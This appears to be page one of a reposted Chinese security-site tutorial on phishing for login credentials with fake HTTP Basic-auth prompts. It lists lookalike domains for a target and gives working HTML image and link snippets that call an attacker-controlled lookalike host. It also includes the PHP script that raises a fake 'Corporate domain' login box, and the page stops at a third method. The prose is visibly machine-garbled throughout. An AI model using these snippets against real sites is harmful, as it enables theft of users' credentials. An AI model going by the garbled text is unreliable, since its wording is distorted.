欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

社工钓鱼技术新认知详谈怎样构造自己的入门认证社工钓鱼网页

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿

在咱们以前的一篇文章中,咱们介绍了一款异常受黑客爱好的对象-Responder,该对象经由过程在浏览器中弹出“根基身份认证”提醒框,并诱骗用户输出自己的登录凭证信息,进而获得用户的登录凭证。Responder应用的诱骗办法是相称不错的,由于它经由过程某些办法可以或许捕捉用户机械上的DNS哀求,并可以或许对这些哀求作出相应,但是我认为根基身份认证办法在网络社工钓鱼上会有更大的后劲。
在请求用户输出登录凭证的那些根基认证哀求中,可以或许用户素来都搞不清楚是哪些网站在请求他们输出登录凭证信息,和输出登录凭证以后会产生些甚么。这类凌乱平日会应用户堕入简略的网络社工钓鱼攻击入侵中,从而使得网络攻击入侵者可以或许轻松的网络用户的登录凭证。
平日情况下,用户应当可以或许基于以下两个安全标准来肯定浏览器中弹出的根基身份认证哀求是不是实在的:
1. 把稳与根基身份认证哀求相干的IP地点或许域名实体是不是可托的。但由于网络攻击入侵者可以或许注册类似于可托域的域名,因此该安全标准可以或许起不到很大的感化。比方,当网络攻击入侵者测验考试获得用户登录targetdomain.com网站的登录凭证时,网络攻击入侵者可以或许注册以下与targetdomain.com类似的域名:
targetdomain.co/.net
target-domain.com
targetdomain-oauth.com
targetdomain -cdn .com
targetdomain-images.com
login- targetdomain.com
2. 把稳与根基身份认证哀求相干的“Realm”参数值。但这是一个可以或许由攻击入侵者捏造的随意率性字符串。经由过程捏造该字符串可以或许用来诱骗用户,使其认为根基认证提醒是实在的:
必要网络署理身份认证
您由于不活动而加入登录,请您再次登录
若何构建自己的根基认证社工钓鱼页面
上面让咱们一路看看几个例子,这些例子中的根基身份认证提醒可以或许真的会让用户觉得异常迷惑。假定targetdomain.com是一个实在正当的网站,攻击入侵者可以或许简略地注册target-domain.com这个域名,该域名看起来跟targetdomain.com这个域名异常的类似。
1. 经由过程应用HTML image标签获得根基身份认证提醒
假如网络攻击入侵者可以或许向一个网站增加HTML IMG标签,而且可以或许从其节制的网站域名中援用增加到其余网站中的图象元素,那末攻击入侵者可以或许在加载图象元素以前强迫履行根基认证提醒操纵,上面的代码是一个简短的演示:targetdomain.com/image.html是targetdomain.com网站中的一个网页,该网页包括了第三方网站target-domain.com上的一张图片:
html>
    body>
Just a funny cat image
        img src="http://target-domain.com/basicauth.php" alt="Could not load image - Invalid credentils."/>
    body>
html>
target-domain.com/basicauth.php是网络攻击入侵者节制的网站中的一个php文件,用户一旦拜访了该php文件,那末网站就会请求用户输出根基身份认证的凭证信息。
$valid_passwords = array ("security" => "cafe");
$valid_users = array_keys($valid_passwords);
 
$user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : "";
$pass = isset($_SERVER['PHP_AUTH_PW'])   ? $_SERVER['PHP_AUTH_PW']   : "";
$validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]);
if (!$validated) {
  header('WWW-Authenticate: Basic realm="Corporate domain"');
  //header('HTTP/1.0 401 Unauthorized');
  die ("Not authorized");
}
// If the user enters valid credentials, just show him a cat picture
header("Location: /Article/UploadPic/2017-9/2017913202912803.jpg")
?>
经由过程上述的例子咱们可以或许发明,网站上的根基认证提醒是由托管在第三方网站上的图象天生的。 一旦用户在根基认证提醒中输出了任何的登录凭证,这些凭证数据都将会被发送到第三方网站。这类攻击入侵伎俩可以或许在Firefox和IE这两个浏览器上见效,以下图所示,但Chrome浏览器是不会表现根基身份认证提醒的。

2. 在关上URL时获得根基身份认证提醒
假如攻击入侵者可以或许将HTML Anchors增加到一个正当的网站上,并增加一个可以或许拜访到第三方网站的链接,那末攻击入侵者可以或许在第三方网站增加根基身份认证供给功效,一旦用户拜访了包括第三方链接的网页,那末用户将在导航产生以前收到根基身份认证提醒信息,详细例子以下所示。
targetdomain.com/link.html是targetdomain.com网站中的一个网页,该网页中包括了一个指向第三方网站的链接:
html>
    body>
A cool website you should visit: a href="http://target-domain.com/basicauth.php">Click me!a>
    body>
html>
因此,一旦用户拜访了上述中的targetdomain.com/link.html页面,根基身份认证提醒信息将在加载新的URL以前表现给用户。这类攻击入侵伎俩可以或许在Firefox和IE两个浏览器中见效,而Chrome浏览器则会在表现根基认证提醒以前封闭主机页面并更新浏览器中的地点栏。

3. 在新选项卡中关上URL时获得根基身份认证提醒
假如攻击入侵者可以或许将一个链接增加到正当网站的某网页中,而且该链接是用来在浏览器中关上一个新的tab页面。当有用户拜访该网页时,那末根基身份认证提醒将在浏览器关上新的tab页面时表现给用户。在完成上,攻击入侵者可以或许经由过程应用window.opener使得根基身份认证提醒出如今新的tab页面中,详细实例代码以下所示。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载